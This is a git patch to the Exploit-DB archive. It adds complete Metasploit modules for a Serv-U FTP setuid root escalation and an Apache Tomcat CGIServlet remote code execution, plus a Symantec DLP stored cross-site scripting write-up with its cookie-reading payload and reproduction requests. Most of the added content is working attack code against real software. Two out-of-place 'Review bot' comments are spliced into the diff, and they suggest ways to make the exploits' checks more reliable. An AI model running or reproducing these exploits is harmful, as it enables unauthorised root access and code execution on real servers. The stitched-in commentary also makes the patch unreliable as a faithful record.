From 1a13989f12a356d0380c3bb98dcf7d48cb3745e6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 4 Jul 2019 05:01:54 +0000
Subject: [PATCH] DB: 2019-07-04 5 changes to exploits/shellcodes Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit) AZADMIN CMS 1.0 - SQL Injection WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection Symantec DLP 15.5 MP1 - Cross-Site Scripting Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
---
exploits/linux/local/47072.rb | 172 ++++++++++++++++++++++++++++
exploits/linux/webapps/47059.txt | 1 -
exploits/multiple/webapps/47071.txt | 81 +++++++++++++
exploits/windows/remote/47073.rb | 131 +++++++++++++++++++++
files_exploits.csv | 15 ++-
files_shellcodes.csv | 2 +-
shellcodes/linux_x86/47068.c | 2 +-
7 files changed, 395 insertions(+), 9 deletions(-)
create mode 100755 exploits/linux/local/47072.rb
create mode 100644 exploits/multiple/webapps/47071.txt
create mode 100755 exploits/windows/remote/47073.rb
diff --git a/exploits/linux/local/47072.rb b/exploits/linux/local/47072.rb
new file mode 100755
index 000000000..a26288eb9
--- /dev/null
+++ b/exploits/linux/local/47072.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on systems running
+ Serv-U FTP Server versions prior to 15.1.7.
+
+ The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+ in a call to `system()`, without validation, when invoked with
+ the `-prepareinstallation` flag, resulting in command execution
+ with root privileges.
+
+ This module has been tested successfully on Serv-U FTP Server
+ version 15.1.6 (x64) on Debian 9.6 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Guy Levin', # @va_start - Discovery and exploit
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2019-06-05',
+ 'References' =>
+ [
+ ['CVE', '2019-12181'],
+ ['EDB', '47009'],
+ ['PACKETSTORM', '153333'],
+ ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
+ ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
+ ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+ ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
+ ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+ ],
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultOptions' =>
+ {
+ 'PrependSetresuid' => true,
+ 'PrependSetresgid' => true,
+ 'PrependFork' => true,
+ 'WfsDelay' => 30
+ },
+ 'DefaultTarget' => 0))
+ register_options [
+ OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def servu_path
+ datastore['SERVU_PATH']
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ chmod path
+ end
+
+ def check
+ unless command_exists? 
'bash'
+ vprint_error 'bash shell is not available'
+ return CheckCode::Safe
+ end
+ vprint_good 'bash shell is available'
+
+ unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+ vprint_error "#{servu_path} is not executable"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is executable"
+
+ unless setuid? servu_path
+ vprint_error "#{servu_path} is not setuid"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is setuid"
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ unless check == CheckCode::Detected
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ if nosuid? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric 10..15}"
+ @payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx @payload_path, generate_payload_exe
+
+ argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
+ cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+ vprint_status "Executing command: #{cmd}"
+ cmd_exec cmd
+
+ unless setuid? @payload_path
+ fail_with Failure::Unknown, 'Failed to set payload setuid root'
+ end
+ print_good "#{@payload_path} setuid root successfully"
+
+ print_status 'Executing payload...'
+ res = cmd_exec "#{@payload_path} &"
+ vprint_line res
+ end
+
+ def on_new_session(session)
+ if session.type.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 
'stdapi'
+ session.fs.file.rm @payload_path
+ else
+ session.shell_command_token "rm -f '#{@payload_path}'"
+ end
+ ensure
+ super
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/47059.txt b/exploits/linux/webapps/47059.txt
index 2f5c0bf58..d5d532897 100644
--- a/exploits/linux/webapps/47059.txt
+++ b/exploits/linux/webapps/47059.txt
@@ -3,7 +3,6 @@
 # Date: 6/29/2019
 # Exploit Author: Joey Lane
 # Vendor Homepage: https://www.cyberpowersystems.com
-# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
 # Version: 3.4.0
 # Tested on: Ubuntu 16.04
 # CVE : Pending
diff --git a/exploits/multiple/webapps/47071.txt b/exploits/multiple/webapps/47071.txt
new file mode 100644
index 000000000..8981f58f8
--- /dev/null
+++ b/exploits/multiple/webapps/47071.txt
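Review bot: `check` never compares the installed Serv-U version with the 15.1.7 fix named in the description; it returns `CheckCode::Detected` as soon as `SERVU_PATH` is executable and setuid, so a patched 15.1.7+ install is reported the same way and `exploit` goes on to drop and run the payload. That is worth stating at the final return of `check`: `# No version check is performed; a patched (>= 15.1.7) setuid binary is also reported as Detected.`. Separately, `servu_path` is spliced into the single-quoted `test -x '...'` command in `check` and unquoted into `cmd` in `exploit`, so an operator-supplied path containing a quote or a space breaks both commands; passing it through `Shellwords.escape` at both sites would make the option safe to forward. In `on_new_session`, `session.fs.file.rm` is not rescued, so a failed cleanup surfaces as an exception rather than a warning, although the `ensure super` still runs.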
@@ -0,0 +1,81 @@
+# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
+# Date: 2019-06-21
+# Exploit Author: Chapman Schleiss
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://support.symantec.com/us/en/mysymantec.html
+# Version: <= 15.5 MP1
+# CVE : 2019-9701
+# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
+# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
+
+Description
+---------------
+Persistent XSS via 'name' param at
+/ProtectManager/enforce/admin/senderrecipientpatterns/list
+
+
+Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
+Browser: Firefox 64, IE 11
+Date Observed: 15 January 2019
+
+
+Reproduction POST
+-----------------
+POST
+/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
+HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 558
+Connection: close
+
+name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
+40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
+&id=41&version=30
+
+Reproduction GET
+----------------
+GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Connection: close
+
+Reproduction Response
+---------------------
+
+
+
+
+ Success +
+
+
Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully.
+
+
+ +
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/remote/47073.rb b/exploits/windows/remote/47073.rb
new file mode 100755
index 000000000..38879d7c9
--- /dev/null
+++ b/exploits/windows/remote/47073.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+ enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+ system commands, and gain remote code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Yakov Shafranovich', # Original discovery
+ 'sinn3r' # Metasploit module
+ ],
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+ ],
+ 'References' =>
+ [
+ ['CVE', '2019-0232'],
+ ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+ ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+ ],
+ 'Notes' =>
+ {
+ 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ CRASH_SAFE ]
+ },
+ 'CmdStagerFlavor' => 'vbs',
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8080
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+ ])
+
+ register_advanced_options(
+ [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ])
+
+ deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+ end
+
+ def check
+ sig = 
Rex::Text.rand_text_alpha(10)
+ uri = normalize_uri(target_uri.path)
+ uri << "?&echo+#{sig}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ vprint_error('No Response from server')
+ return CheckCode::Unknown
+ end
+
+ if res.body.include?(sig)
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, opts={})
+ # Our command stager assumes we have access to environment variables.
+ # We don't necessarily have that, so we have to modify cscript to a full path.
+ cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
+
+ uri = normalize_uri(target_uri.path)
+ uri << "?&#{CGI.escape(cmd)}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ fail_with(Failure::Unreachable, 'No response from server')
+ end
+
+ unless res.code == 200
+ fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+ end
+ end
+
+ # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
+ # so we need to rely on the user to cleanup the files.
+ def on_new_session(cli)
+ print_warning('Make sure to manually cleanup the exe generated by the exploit')
+ super
+ end
+
+ def exploit
+ print_status("Checking if #{rhost} is vulnerable")
+ unless check == CheckCode::Vulnerable
+ unless datastore['ForceExploit']
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+ end
+
+ print_warning('Target does not appear to be vulnerable.')
+ end
+
+ print_status("#{rhost} seems vulnerable, what a good day.")
+ execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 11b13f218..bde51eef6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
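Review bot: `check` returns `CheckCode::Vulnerable` whenever the response body contains `sig`, without consulting `res.code`, so an error page that reflects the requested URI (the `?&echo+<sig>` query is part of it) produces a false positive and `exploit` then pushes the whole VBS stager at a host that is not vulnerable. Requiring a 200 and the echoed token on a line of its own, `if res.code == 200 && res.body.match?(/^#{sig}\r?$/)`, would tie the result to actual command output rather than reflection. In `execute_command`, `cmd.gsub!(...)` mutates the caller's string and rewrites every occurrence of `cscript`, including any that happens to appear inside the staged data; `cmd = cmd.sub('cscript', 'C:\\Windows\\System32\\cscript.exe')` limits it to the first, presumably the interpreter invocation, though the stager's exact command shape is not visible here. The "seems vulnerable, what a good day" status in `exploit` is also printed after a `ForceExploit` override of a Safe result, which is misleading in the log.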
@@ -10564,6 +10564,7 @@ id,file,description,date,author,type,platform,port
 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
+47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17518,6 +17519,7 @@ id,file,description,date,author,type,platform,port
 47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
 47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
 47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
+47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41437,14 +41439,14 @@ id,file,description,date,author,type,platform,port
 47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
 47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
 47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
-47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80
 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
-47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
-47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
 47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
-47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet 
EMIROGLU",webapps,php,80
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80
 47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
 47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
@@ -41454,3 +41456,4 @@ id,file,description,date,author,type,platform,port
 47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
 47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
 47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php,
+47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e1208f284..f13582632 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
 47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47068.c b/shellcodes/linux_x86/47068.c
index 7d577ab0f..3de6c346d 100644
--- a/shellcodes/linux_x86/47068.c
+++ b/shellcodes/linux_x86/47068.c
@@ -2,7 +2,7 @@
 ;Category: Shellcode
 ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21 bytes)
-;Author: kiriknik
+;Author: Kirill Nikolaev
 ;Date: 01/07/2019
 ;Architecture: Linux x86